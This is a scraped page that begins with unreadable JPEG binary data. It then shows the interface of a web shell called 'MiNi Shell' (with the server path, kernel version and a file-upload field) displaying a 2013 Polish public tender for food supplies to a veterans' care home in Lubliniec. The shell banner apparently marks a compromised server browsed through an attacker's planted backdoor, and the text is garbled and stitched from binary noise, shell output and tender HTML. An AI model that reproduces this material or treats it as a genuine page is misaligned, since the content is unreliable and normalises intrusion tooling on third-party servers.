JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/203164-N-2013.html

<p class="kh_header"><b>Lubliniec: Sprzedaż wraz z sukcesywną dostawą różnych artykułów spożywczych na rzecz DPS Dom Kombatanta im. św Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr. E. Cyrana 10 dla zamówienia o szacunkowej wartości poniżej kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy - Prawo zamówień publicznych.</b><br>
<b>Numer ogłoszenia: 203164 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Dom Kombatanta" im. św. Rafała Kalinowskiego , ul. Cyrana 10, 42-700 Lubliniec, woj. śląskie, tel. 034 3564004, faks 034 3564192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dpskombatant.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna nie mająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z sukcesywną dostawą różnych artykułów spożywczych na rzecz DPS Dom Kombatanta im. św Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr. E. Cyrana 10 dla zamówienia o szacunkowej wartości poniżej kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy - Prawo zamówień publicznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi sprzedaż wraz z sukcesywną dostawą różnych artykułów spożywczych na rzecz Domu Pomocy Społecznej Dom Kombatanta im. św Rafała Kalinowskiego z siedzibą w Lublińcu ul. dr. Emila Cyrana 10. Zakres zamówienia podano w załączniku nr 2 do SIWZ. ZADANIE NR 1 Cukier kg 1 kg 2 500 Cukier puder 500g 1 szt 40 Cukier waniliowy 32g 1 szt 150 Kasza kukurydziana gat. I kg 1 kg 120 Kasza gryczana gat. I kg 1 kg 100 Kasza jęczmienna gat. I kg 1 kg 300 Kasza manna gat. I kg 1 kg 220 Mąka pszenna typu 450 lub 500 kg 1 kg 900 Mąka ziemniaczana kg 1 kg 300 Mak kg 1 kg 10 Makaron typu Czaniec 4-jajeczny (krajanka rosołowa) 250g 1 szt 700 lub równoważny* Płatki jęczmienne kg 1 kg 80 Płatki ryżowe kg 1 kg 90 Płatki owsiane górskie kg 1 kg 80 Ryż długoziarnisty gat. I kg 1 kg 500 Sól spożywcza kg 1 kg 600 ZADANIE NR 2 Aromat do ciast 10ml 1 szt 30 Bazylia 10g 1 szt 10 Czosnek granulowany 20g 1 szt 400 Cynamon 20g 1 szt 50 Fix do potraw meksykańskich 25g 1 szt 20 Gałka muszkat. miel. 10g 1 szt 20 Herbata 100g 1 szt 1 100 Imbir mielony 15g 1 szt 20 Kakao naturalne ciemne 100g 1 szt 70 Kawa zbożowa kg 1 kg 130 Kminek 20g 1 szt 50 Kwasek cytrynowy 50g 1 szt 120 Liść laurowy 8g 1 szt 80 Majeranek 10g 1 szt 150 Miód w pudełkach (nie w saszetkach) 25g 1 szt 2 500 Oregano 10g 1 szt 10 Papryka słodka 20g 1 szt 300 Pieprz czarny mielony 50g 1 szt 200 Pieczywo chrupkie wielozbożowe 180-220g 1 szt 120 Posypka do ciast szt 1 szt 10 Przyprawa CURRY 200g 1 szt 20 Przyprawa warzywna uniwersalna do zup i potraw, kg 1 szt 100 zawartość suszonych warzyw min. 15% Przyprawa do piernika szt 1 szt 20 Przyprawa ziarenka smaku kg 1 kg 50 Rodzynki kg 1 kg 6 Suchary (bez cukru) 285g 1 szt 60 Tymianek 10g 1 szt 10 Ziele angielskie op 15g 1 szt 90 Zioła prowansalskie 10g 1 szt 10 Żelatyna 50g 1 szt 200 ZADANIE NR 3 Jaja L szt 1 szt 25 000 ZADANIE NR 4 Brzoskwinie (puszki) 850g 1 szt 6 Chrzan tarty 180-200g 1 szt 100 Dżem owoce min. 30g w 100g produktu 260-300g 1 szt 500 Fasola szparagowa konserwowa 500g 1 szt 400 Fasola czerwona konserwowa 400g 1 szt 100 Groszek konserwowy zielony (nie suszony) 400g 1 szt 700 Kompot wiśnia (masa owoców po odcieku min. 400g) 0,9l 1 szt 200 Kompot czarna porzeczka (masa owoców po odcieku min. 400g) 0,9l 1 szt 200 Koncentrat barszczu 300-350 ml 1 szt 100 Koncentrat pomidorowy, pasta pomidorowa 200g 1 szt 150 (bez dodatku wody) typu KOTLIN lub PUDLISZKI 30% lub równoważny* Koncentrat pomidorowy pasta pomidorowa 0,9l 1 szt 150 (bez dodatku wody) typu KOTLIN lub PUDLISZKI 30% lub równoważny* Ketchup 500g 1 szt 40 Kukurydza konserwowa 400g 1 szt 50 Majonez dekoracyjny 400ml 1 szt 150 Mandarynki (puszki) 312g 1 szt 6 Marmolada wieloowocowa 400g 1 szt 150 Musztarda 350g 1 szt 280 Ogórek konserwowy 900 ml 1 szt 60 Ocet 0,5l 1 szt 90 Olej 3l 1 szt 50 Olej 1l 1 szt 200 Olej 0,5l 1 szt 60 Pasztet drobiowy typu PROFI Wielkopolski 131g 1 szt 1 200 lub równoważny* Przyprawa w płynie do zup, sosów, potraw mięsnych i 0,96l 1 szt 180 warzywnych. Składniki: woda, sól, wzmacniacze smaku (glutaminian monosodowy, E635), ocet, glukoza, ekstrakt drożdżowy, aromat. Szklana ciemna butelka Powidła śliwkowe 400g 1 szt 200 Papryka konserwowa 900 ml 1 szt 40 Szczaw konserwowy 350g 1 szt 150 Sos Tatarski 250 ml 1 szt 30 Sok owocowy bez cukru 200 ml 1 szt 100 Sok przecierowy marchwiowo-owocowy 300-330 ml 1 szt 100 bez cukru, typu Kubuś ZADANIE NR 5 Makaron świderki 4-jajeczny kg 1 kg 350 Makaron muszelki 4-jajeczny kg 1 kg 100 Makaron gwiazdki 4-jajeczny kg 1 kg 50..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3, 15.32.00.00-7, 15.33.14.00-1, 15.32.17.00-1, 15.33.14.27-6, 15.33.24.00-8, 15.33.14.62-3, 15.43.10.00-8, 15.41.12.00-4, 15.61.21.00-2, 15.61.41.00-6, 15.83.10.00-2, 15.86.41.00-3, 15.87.12.30-5, 15.87.12.73-8, 15.85.11.00-9, 15.87.12.50-1, 15.87.11.10-8, 15.87.24.00-5, 15.86.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę w postępowaniu oświadczenia stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę w postępowaniu oświadczenia stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę w postępowaniu oświadczenia stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę w postępowaniu oświadczenia stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego dokumentu potwierdzającego ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności (w szczególności, chodzi o działalność, która jest zgodna z przedmiotem zamówienia), przy czym ubezpieczenie musi spełniać następujące warunki minimalne: a) okres ubezpieczenia: aktualne na chwilę składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. Konsorcjum, spółka cywilna), na zasadach określonych w art. 23 ustawy Prawo zamówień publicznych, Zamawiający przed zawarciem umowy będzie żądał umowy regulującej współpracę tych Wykonawców. 2. Wypełniony i podpisany przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy formularz oferty - według wzoru stanowiącego załącznik nr 1 do SIWZ; Wypełniona i podpisana przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy 3. kalkulacja ofertowa - według wzoru stanowiącego załącznik nr 2 do SIWZ; 4. W przypadku gdy Wykonawca upoważnia do reprezentowania w postępowaniu inną osobę stosowne pełnomocnictwo z wyszczególnieniem zakresu upoważnienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany postanowień  umowy  mogą nastąpić jedynie w zakresie określonym 
    w art. 144 ustawy Prawo zamówień publicznych. Zamawiający zastrzega sobie prawo 
    dopuszczenia zmian w umowie w przypadku:
a). zmiany ustawowej stawki VAT strony przewidują możliwość zmiany 
     wynagrodzenia o wysokość podaną w obowiązujących przepisach prawa.
b) zmiany terminu realizacji umowy.
c) gdy zmiany będą korzystne dla Zamawiającego i nie będą: 
-  wprowadzone nowe warunki, które gdyby zostały ujęte w ramach procedury 
    przetargowej udzielenie zamówienia uniemożliwiłoby dopuszczenie innych ofert niż ta 
    która została pierwotnie dopuszczona,
 - modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, 
   który nie był przewidziany w postanowieniach pierwotnego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskombatant.pl/strona-glowna,   www.lubliniec.starostwo.bip.info.pl/index.php?idmp=335&r=o<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego siedziba w Lublińcu, ul. dr E. Cyrana 10, pok. nr 27, w godz. od 7:00 do 15:00 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 10:45, miejsce: Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego siedziba w Lublińcu, ul. dr E. Cyrana 10, sekretariat pok. nr 35..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier kg 1 kg 2 500 Cukier puder 500g 1 szt 40 Cukier waniliowy 32g 1 szt 150 Kasza kukurydziana gat. I kg 1 kg 120 Kasza gryczana gat. I kg 1 kg 100 Kasza jęczmienna gat. I kg 1 kg 300 Kasza manna gat. I kg 1 kg 220 Mąka pszenna typu 450 lub 500 kg 1 kg 900 Mąka ziemniaczana kg 1 kg 300 Mak kg 1 kg 10 Makaron typu Czaniec 4-jajeczny (krajanka rosołowa) 250g 1 szt 700 lub równoważny* Płatki jęczmienne kg 1 kg 80 Płatki ryżowe kg 1 kg 90 Płatki owsiane górskie kg 1 kg 80 Ryż długoziarnisty gat. I kg 1 kg 500 Sól spożywcza kg 1 kg 600..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.00.00-2, 15.61.20.00-1, 15.85.11.00-9, 15.61.40.00-5, 15.61.33.80-5, 15.61.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aromat do ciast 10ml 1 szt 30 Bazylia 10g 1 szt 10 Czosnek granulowany 20g 1 szt 400 Cynamon 20g 1 szt 50 Fix do potraw meksykańskich 25g 1 szt 20 Gałka muszkat. miel. 10g 1 szt 20 Herbata 100g 1 szt 1 100 Imbir mielony 15g 1 szt 20 Kakao naturalne ciemne 100g 1 szt 70 Kawa zbożowa kg 1 kg 130 Kminek 20g 1 szt 50 Kwasek cytrynowy 50g 1 szt 120 Liść laurowy 8g 1 szt 80 Majeranek 10g 1 szt 150 Miód w pudełkach (nie w saszetkach) 25g 1 szt 2 500 Oregano 10g 1 szt 10 Papryka słodka 20g 1 szt 300 Pieprz czarny mielony 50g 1 szt 200 Pieczywo chrupkie wielozbożowe 180-220g 1 szt 120 Posypka do ciast szt 1 szt 10 Przyprawa CURRY 200g 1 szt 20 Przyprawa warzywna uniwersalna do zup i potraw, kg 1 szt 100 zawartość suszonych warzyw min. 15% Przyprawa do piernika szt 1 szt 20 Przyprawa ziarenka smaku kg 1 kg 50 Rodzynki kg 1 kg 6 Suchary (bez cukru) 285g 1 szt 60 Tymianek 10g 1 szt 10 Ziele angielskie op 15g 1 szt 90 Zioła prowansalskie 10g 1 szt 10 Żelatyna 50g 1 szt 200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.20.00-1, 15.89.40.00-1, 15.86.00.00-4, 15.84.00.00-8, 15.87.12.50-1, 15.87.11.00-5, 15.41.12.00-4, 15.83.16.00-8, 15.81.00.00-9, 15.87.12.00-6, 15.82.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja L szt 1 szt 25 000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brzoskwinie (puszki) 850g 1 szt 6 Chrzan tarty 180-200g 1 szt 100 Dżem owoce min. 30g w 100g produktu 260-300g 1 szt 500 Fasola szparagowa konserwowa 500g 1 szt 400 Fasola czerwona konserwowa 400g 1 szt 100 Groszek konserwowy zielony (nie suszony) 400g 1 szt 700 Kompot wiśnia (masa owoców po odcieku min. 400g) 0,9l 1 szt 200 Kompot czarna porzeczka (masa owoców po odcieku min. 400g) 0,9l 1 szt 200 Koncentrat barszczu 300-350 ml 1 szt 100 Koncentrat pomidorowy, pasta pomidorowa 200g 1 szt 150 (bez dodatku wody) typu KOTLIN lub PUDLISZKI 30% lub równoważny* Koncentrat pomidorowy pasta pomidorowa 0,9l 1 szt 150 (bez dodatku wody) typu KOTLIN lub PUDLISZKI 30% lub równoważny* Ketchup 500g 1 szt 40 Kukurydza konserwowa 400g 1 szt 50 Majonez dekoracyjny 400ml 1 szt 150 Mandarynki (puszki) 312g 1 szt 6 Marmolada wieloowocowa 400g 1 szt 150 Musztarda 350g 1 szt 280 Ogórek konserwowy 900 ml 1 szt 60 Ocet 0,5l 1 szt 90 Olej 3l 1 szt 50 Olej 1l 1 szt 200 Olej 0,5l 1 szt 60 Pasztet drobiowy typu PROFI Wielkopolski 131g 1 szt 1 200 lub równoważny* Przyprawa w płynie do zup, sosów, potraw mięsnych i 0,96l 1 szt 180 warzywnych. Składniki: woda, sól, wzmacniacze smaku (glutaminian monosodowy, E635), ocet, glukoza, ekstrakt drożdżowy, aromat. Szklana ciemna butelka Powidła śliwkowe 400g 1 szt 200 Papryka konserwowa 900 ml 1 szt 40 Szczaw konserwowy 350g 1 szt 150 Sos Tatarski 250 ml 1 szt 30 Sok owocowy bez cukru 200 ml 1 szt 100 Sok przecierowy marchwiowo-owocowy 300-330 ml 1 szt 100 bez cukru, typu Kubuś..</p></li>
